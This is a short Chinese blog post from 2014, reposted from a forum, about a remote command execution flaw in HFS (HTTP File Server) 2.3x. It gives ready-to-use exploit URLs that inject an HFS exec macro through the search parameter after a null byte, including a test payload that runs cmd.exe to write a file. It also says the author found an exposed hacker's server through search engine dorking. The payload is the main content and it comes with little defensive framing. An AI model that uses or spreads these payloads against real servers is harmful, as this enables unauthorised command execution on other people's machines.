黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)

8,849次阅读
没有评论

共计 299 个字符,预计需要花费 1 分钟才能阅读完成。

从某论坛看见的,转载部分: 
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 

http://localhost:80/?search==%00{.exec|cmd.} 

http://localhost:80/search=%00{.exec|cmd.} 

注:有些版本search前面是没有?的。 

测试部分: 
百度搜HFS默认就是2.3x版本,执行echo测试成功: 
http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.} 
google hack了一下,发现一个抓鸡黑阔:

黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)

黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)

已测试官方最新版,一样存在。

黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)

黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)


正文完
 0
admin
版权声明:本站原创文章,由 admin 于2014-10-25发表,共计299字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)
验证码